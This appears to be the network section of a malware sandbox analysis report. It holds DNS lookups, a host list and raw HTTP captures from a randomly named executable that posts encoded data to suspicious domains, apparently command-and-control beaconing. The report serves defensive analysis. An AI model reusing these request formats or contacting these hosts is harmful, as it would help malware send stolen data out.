                                    Jul 11, 2024 15:07:30.652074099 CEST192.168.2.61.1.1.10xc2a6Standard query (0)www.j51a.xyzA (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:44.743383884 CEST192.168.2.61.1.1.10x528cStandard query (0)www.dospole.topA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jul 11, 2024 15:05:38.903593063 CEST1.1.1.1192.168.2.60xe1feNo error (0)www.u9games.xyzghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                    Jul 11, 2024 15:05:38.903593063 CEST1.1.1.1192.168.2.60xe1feNo error (0)ghs.googlehosted.com142.250.186.115A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:00.456995964 CEST1.1.1.1192.168.2.60x4bc5No error (0)www.dtalusering.com103.42.108.46A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:16.700287104 CEST1.1.1.1192.168.2.60x19eeNo error (0)www.alphacentura.com188.114.97.3A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:16.700287104 CEST1.1.1.1192.168.2.60x19eeNo error (0)www.alphacentura.com188.114.96.3A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:32.594490051 CEST1.1.1.1192.168.2.60x1da1No error (0)www.xn72dkd7scx.shopweien.cdn.youziyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                    Jul 11, 2024 15:06:32.594490051 CEST1.1.1.1192.168.2.60x1da1No error (0)weien.cdn.youziyuncdn.com134.122.138.60A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:32.594628096 CEST1.1.1.1192.168.2.60x1da1No error (0)www.xn72dkd7scx.shopweien.cdn.youziyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                    Jul 11, 2024 15:06:32.594628096 CEST1.1.1.1192.168.2.60x1da1No error (0)weien.cdn.youziyuncdn.com134.122.138.60A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:32.594638109 CEST1.1.1.1192.168.2.60x1da1No error (0)www.xn72dkd7scx.shopweien.cdn.youziyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                    Jul 11, 2024 15:06:32.594638109 CEST1.1.1.1192.168.2.60x1da1No error (0)weien.cdn.youziyuncdn.com134.122.138.60A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:46.226650000 CEST1.1.1.1192.168.2.60x770dNo error (0)www.dynamologistics.net35.212.86.52A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:59.723392963 CEST1.1.1.1192.168.2.60x6e4fNo error (0)www.globaltrend.xyz188.114.96.3A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:06:59.723392963 CEST1.1.1.1192.168.2.60x6e4fNo error (0)www.globaltrend.xyz188.114.97.3A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:14.873545885 CEST1.1.1.1192.168.2.60xa228No error (0)www.ffi07s.xyz188.114.97.3A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:14.873545885 CEST1.1.1.1192.168.2.60xa228No error (0)www.ffi07s.xyz188.114.96.3A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881448030 CEST1.1.1.1192.168.2.60xc2a6No error (0)www.j51a.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881448030 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.222.238.52A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881448030 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz172.247.15.110A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881448030 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz172.247.21.75A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881448030 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.12.34.91A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881448030 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.12.34.252A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881674051 CEST1.1.1.1192.168.2.60xc2a6No error (0)www.j51a.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881674051 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.222.238.52A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881674051 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz172.247.15.110A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881674051 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz172.247.21.75A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881674051 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.12.34.91A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881674051 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.12.34.252A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881932974 CEST1.1.1.1192.168.2.60xc2a6No error (0)www.j51a.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881932974 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.222.238.52A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881932974 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz172.247.15.110A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881932974 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz172.247.21.75A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881932974 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.12.34.91A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:30.881932974 CEST1.1.1.1192.168.2.60xc2a6No error (0)huayang.302.gn301.xyz154.12.34.252A (IP address)IN (0x0001)false
                                    Jul 11, 2024 15:07:45.077600956 CEST1.1.1.1192.168.2.60x528cNo error (0)www.dospole.top162.254.38.56A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • www.u9games.xyz
                                    • www.dtalusering.com
                                    • www.alphacentura.com
                                    • www.xn72dkd7scx.shop
                                    • www.dynamologistics.net
                                    • www.globaltrend.xyz
                                    • www.ffi07s.xyz
                                    • www.j51a.xyz
                                    • www.dospole.top

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.649718142.250.186.115806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:05:38.936362028 CEST578OUTGET /5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.u9games.xyz
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:05:40.013902903 CEST553INHTTP/1.1 301 Moved Permanently
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Thu, 11 Jul 2024 13:05:39 GMT
                                    Location: https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw%3D&GX=iP9xCL
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Connection: close
                                    Jul 11, 2024 15:05:40.021761894 CEST553INHTTP/1.1 301 Moved Permanently
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Thu, 11 Jul 2024 13:05:39 GMT
                                    Location: https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw%3D&GX=iP9xCL
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.649721103.42.108.46806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:00.490458012 CEST859OUTPOST /la5g/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dtalusering.com
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dtalusering.com
                                    Referer: http://www.dtalusering.com/la5g/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 78 6b 39 2b 53 72 53 75 73 45 56 74 6f 42 54 31 6a 42 51 72 47 6a 38 45 51 59 53 66 56 67 33 61 67 79 76 6c 43 4f 70 63 69 31 77 78 45 72 74 56 61 77 55 6e 35 58 30 63 71 62 71 39 48 5a 78 77 2f 74 46 53 6f 59 74 49 73 43 67 64 4e 73 35 4f 66 49 2f 50 6c 2b 42 30 41 46 75 4e 79 33 72 5a 6e 64 6b 52 45 6b 42 48 32 55 51 49 59 78 78 74 38 53 2f 76 43 65 6a 6b 44 75 66 79 54 36 58 61 75 5a 69 41 73 67 70 75 57 70 50 31 6d 4b 68 36 41 30 6c 47 50 35 57 30 50 2f 2b 33 36 48 6b 79 54 4c 35 33 6b 52 39 6a 30 65 4e 2f 34 30 66 57 70 46 6f 7a 36 64 54 47 36 36 45 5a 37 35 76 56
                                    Data Ascii: bB=4Nn157qKjsX4xk9+SrSusEVtoBT1jBQrGj8EQYSfVg3agyvlCOpci1wxErtVawUn5X0cqbq9HZxw/tFSoYtIsCgdNs5OfI/Pl+B0AFuNy3rZndkREkBH2UQIYxxt8S/vCejkDufyT6XauZiAsgpuWpP1mKh6A0lGP5W0P/+36HkyTL53kR9j0eN/40fWpFoz6dTG66EZ75vV
                                    Jul 11, 2024 15:06:01.366575956 CEST170INHTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:01 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.649722103.42.108.46806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:03.503858089 CEST883OUTPOST /la5g/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dtalusering.com
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dtalusering.com
                                    Referer: http://www.dtalusering.com/la5g/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 77 46 74 2b 55 4d 6d 75 37 55 56 75 6d 68 54 31 34 52 51 76 47 6a 77 45 51 64 71 50 56 53 6a 61 67 54 66 6c 44 4c 64 63 6a 31 77 78 4d 4c 74 63 56 51 55 67 35 58 49 6c 71 61 57 39 48 59 52 77 2f 76 64 53 6f 76 78 58 74 53 67 66 46 4d 35 4d 52 6f 2f 50 6c 2b 42 30 41 46 37 59 79 33 6a 5a 6e 74 55 52 46 41 56 45 70 6b 51 4c 49 68 78 74 74 69 2f 72 43 65 6a 4e 44 72 48 49 54 34 2f 61 75 63 4f 41 39 52 70 74 63 70 50 76 37 36 67 61 49 6d 30 53 42 70 48 44 44 2b 53 4c 35 56 41 59 62 64 34 74 34 69 39 41 6d 4f 74 39 34 32 48 6b 70 6c 6f 5a 34 64 72 47 6f 74 49 2b 30 4e 4b 32 54 53 65 36 74 51 72 47 4b 4d 49 4f 65 6e 72 6e 48 65 2f 69 51 51 3d 3d
                                    Data Ascii: bB=4Nn157qKjsX4wFt+UMmu7UVumhT14RQvGjwEQdqPVSjagTflDLdcj1wxMLtcVQUg5XIlqaW9HYRw/vdSovxXtSgfFM5MRo/Pl+B0AF7Yy3jZntURFAVEpkQLIhxtti/rCejNDrHIT4/aucOA9RptcpPv76gaIm0SBpHDD+SL5VAYbd4t4i9AmOt942HkploZ4drGotI+0NK2TSe6tQrGKMIOenrnHe/iQQ==
                                    Jul 11, 2024 15:06:04.671303034 CEST170INHTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:04 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed
                                    Jul 11, 2024 15:06:04.676837921 CEST170INHTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:04 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.649723103.42.108.46806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:06.073836088 CEST1896OUTPOST /la5g/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dtalusering.com
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dtalusering.com
                                    Referer: http://www.dtalusering.com/la5g/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 77 46 74 2b 55 4d 6d 75 37 55 56 75 6d 68 54 31 34 52 51 76 47 6a 77 45 51 64 71 50 56 53 62 61 68 68 58 6c 42 6f 46 63 6c 46 77 78 47 72 74 52 56 51 55 78 35 58 51 68 71 61 62 4b 48 64 56 77 39 4d 56 53 75 64 5a 58 6a 53 67 66 4a 73 35 4e 66 49 2f 57 6c 2b 52 77 41 46 72 59 79 33 6a 5a 6e 76 4d 52 41 6b 42 45 36 30 51 49 59 78 78 68 38 53 2b 30 43 66 4c 33 44 72 79 31 55 49 66 61 75 38 65 41 75 44 78 74 47 70 50 78 36 36 67 34 49 6d 34 6b 42 70 61 34 44 2b 57 68 35 57 63 59 4b 34 6c 4e 70 7a 56 4c 30 64 67 46 73 32 33 30 6b 46 6c 72 68 50 7a 32 35 50 49 2b 37 70 43 69 4c 31 57 4c 34 68 65 78 4b 2f 77 2b 43 6e 43 62 4d 74 6d 50 48 45 39 46 6c 6a 35 6e 67 73 54 4b 54 4a 2b 54 6b 6d 6c 39 65 65 76 62 31 70 34 54 79 78 47 46 63 6b 73 37 4f 32 48 59 4f 31 34 4b 7a 64 52 43 36 77 6e 41 33 72 57 35 30 54 47 65 47 53 7a 42 30 58 75 62 65 43 4c 51 64 39 30 65 57 6c 64 5a 37 56 77 63 6f 38 51 68 34 70 79 59 73 58 4b 51 69 34 72 5a 2f 77 76 31 30 74 61 4d 6d 75 4a [TRUNCATED]
                                    Data Ascii: bB=4Nn157qKjsX4wFt+UMmu7UVumhT14RQvGjwEQdqPVSbahhXlBoFclFwxGrtRVQUx5XQhqabKHdVw9MVSudZXjSgfJs5NfI/Wl+RwAFrYy3jZnvMRAkBE60QIYxxh8S+0CfL3Dry1UIfau8eAuDxtGpPx66g4Im4kBpa4D+Wh5WcYK4lNpzVL0dgFs230kFlrhPz25PI+7pCiL1WL4hexK/w+CnCbMtmPHE9Flj5ngsTKTJ+Tkml9eevb1p4TyxGFcks7O2HYO14KzdRC6wnA3rW50TGeGSzB0XubeCLQd90eWldZ7Vwco8Qh4pyYsXKQi4rZ/wv10taMmuJEk9L1QxFUPdM2rfCVYJR81oeTIF9MSa1H3ZujPIWmrAyKjUf6MhGIYSN5IJDIfhU0bsMK8aZO3W+PPjkiy3Lau1eHDFdMYbYuZUtsvryHsOvDpuAN69yPtnB/7fJmdiCdbAOnhfo3Jz2cSvwKkAc5pjmLJK9QkVU3Z1GoDbNn5PWvOtITIFAH0+ZmSJxtE3SRvqQT6QlS02oOY6LUVxKNAZ6FB69opCrOACIB0qbOcsMchyAHHfhl95VeirK23/3dCj8nRN4UWdSbpj8oz+8QO9jc1JGlMQ1RR7h0Edw1g9sS3RlwBcQ0AIQLvnzbw05qvoWJh60mSkPQab+gLDEIV3crbLKrQE0jPYJr2LxcKP44fFumNkmVJfjdO3Zf2VjefOyVdDIwT95WoRLyLSttbzcD15+g5fTorJpNueO5gVIf8P2Eyq9a+PewYe5umAxeauHOg5OjFl3hD/1EsNsw1VSREx8xMjDmyXJ8hWXi+icNEUMwj0eTmJmDmExhp7pjDAwbrohfVLAaGoe9EXC5sLrb7xCKy1IKyosOxWpiMzOmIyxpXtILMylKeJG4WIvffCwILPgvjUhbLaRBtJh9N50PFMdshPPAqMjTZkI70AYcj/ONFlUVa3q98pgm+jngHRLiRfNV3I4e37gAIGFHdpClMa807h8WM [TRUNCATED]
                                    Jul 11, 2024 15:06:06.933346033 CEST170INHTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:06 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.649725103.42.108.46806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:09.188757896 CEST586OUTGET /la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.dtalusering.com
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:06:10.074584007 CEST1236INHTTP/1.1 200 OK
                                    Cache-Control: no-cache, private
                                    Content-Type: text/html; charset=UTF-8
                                    Date: Thu, 11 Jul 2024 13:06:09 GMT
                                    Connection: close
                                    Transfer-Encoding: chunked
                                    Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 41 55 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 74 72 61 69 70 2e 63 6f 6d 2e 61 75 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 79 6e 65 72 67 79 77 68 6f 6c 65 73 61 6c 65 2e 63 6f 6d 2f 6d 61 6e 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 35 36 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 44 72 6f 69 64 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e [TRUNCATED]
                                    Data Ascii: 8000<!DOCTYPE html> <html lang=en-AU><head><link rel="icon" type="image/x-icon" href="https://ventraip.com.au/favicon.ico"><link rel="stylesheet" href="//static.synergywholesale.com/manage/style.css?v=563" type="text/css"><link href="//fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet" type="text/css"><script type="text/javascript" src="/inc/js/components/jquery-3.5.1.min.js"></script><script type="text/javascript" src="/inc/js/components/client.js"></script><link rel="stylesheet" href="/inc/js/components/Aristo.css" type="text/css" /><script type="text/javascript" src="/inc/js/components/jquery-ui.min.js?v=2"></script><link rel="stylesheet" href="/inc/js/components/fancybox.min.css" type="text/css" /><link rel="stylesheet" href="/inc/style/scss/timepicker.css"><link rel="stylesheet" href="/inc/js/components/chosen.css"><script type="text/javascript" src="/inc/js/components/polyfill.min.js"></script><script type="text/jav [TRUNCATED]
                                    Jul 11, 2024 15:06:10.074639082 CEST1236INData Raw: 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 69 6e 63 2f 6a 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 66 61 6e 63 79 62 6f 78 2e 6d
                                    Data Ascii: js"></script><script type="text/javascript" src="/inc/js/components/fancybox.min.js"></script><script type="text/javascript" src="/inc/js/components/sweetalert2.min.js"></script><script type="text/javascript" src="/inc/js/component
                                    Jul 11, 2024 15:06:10.074675083 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                    Data Ascii: width: 100%; display: flex; justify-content: center; max-width: 95vw; } td input, td select { width: 100%;
                                    Jul 11, 2024 15:06:10.074708939 CEST1236INData Raw: 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f
                                    Data Ascii: rtant; line-height: normal; margin: auto; } } p { opacity: 1 !important; } #cor > div {
                                    Jul 11, 2024 15:06:10.074744940 CEST896INData Raw: 20 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 34 70 78 20 33 32 70 78 20 2d 34 70 78 20 72 67 62 61 28 32 35 2c 32 38 2c 31 30 34 2c 2e 31 38 29
                                    Data Ascii: #fff !important; box-shadow: 0 4px 32px -4px rgba(25,28,104,.18); overflow: hidden; border-radius: 12px; margin: 16px auto; } .template-center a {
                                    Jul 11, 2024 15:06:10.074779987 CEST1236INData Raw: 69 64 65 6e 74 69 74 79 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 20 3e 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70
                                    Data Ascii: identity-verification > p { margin: 20px auto; padding: 0 20px; max-width: 575px; } #identity-verification > p:last-of-type { font-weight: bolder;
                                    Jul 11, 2024 15:06:10.074816942 CEST1236INData Raw: 3a 20 31 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 76 65 72 69 66 79 2d 66 6f 72 6d 20 2e 64 6f 63 75 6d 65 6e 74 2d 74 79 70 65 73 5f 5f 73 65 6c 65 63 74 20 3e 20 6c 61 62 65 6c 20
                                    Data Ascii: : 100px; } #verify-form .document-types__select > label > p { width: clamp(100%, 300px, 30vw); } #verify-form .identity-document-form { width: clamp(300px, 7
                                    Jul 11, 2024 15:06:10.074851990 CEST1236INData Raw: 6e 20 63 6f 6e 74 65 6e 74 3d 76 66 42 6f 4a 78 63 74 64 38 47 42 57 62 52 6f 74 59 45 73 55 38 53 6b 6e 6c 69 76 51 55 63 43 4d 4c 54 79 72 69 4b 33 34 44 4d 3e 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 50 61 72 6b 65 64 20 57 69 74 68 20 56 65
                                    Data Ascii: n content=vfBoJxctd8GBWbRotYEsU8SknlivQUcCMLTyriK34DM><title>Domain Parked With VentraIP Australia</title><meta name=next-head-count content=7><style>body,html{padding:0;margin:0;scroll-behavior:smooth!important;color:#09091f}@media only scree
                                    Jul 11, 2024 15:06:10.074886084 CEST1236INData Raw: 68 33 2e 74 68 69 6e 2c 2e 68 34 2e 74 68 69 6e 2c 2e 68 35 2e 74 68 69 6e 2c 2e 68 36 2e 74 68 69 6e 2c 68 31 2e 74 68 69 6e 2c 68 32 2e 74 68 69 6e 2c 68 33 2e 74 68 69 6e 2c 68 34 2e 74 68 69 6e 2c 68 35 2e 74 68 69 6e 2c 68 36 2e 74 68 69 6e
                                    Data Ascii: h3.thin,.h4.thin,.h5.thin,.h6.thin,h1.thin,h2.thin,h3.thin,h4.thin,h5.thin,h6.thin{font-weight:500}}p{font-size:16px;line-height:24px}@media only screen and (max-width:1200px){p{font-size:14px;line-height:20px}}.body1{font-size:16px;line-heigh
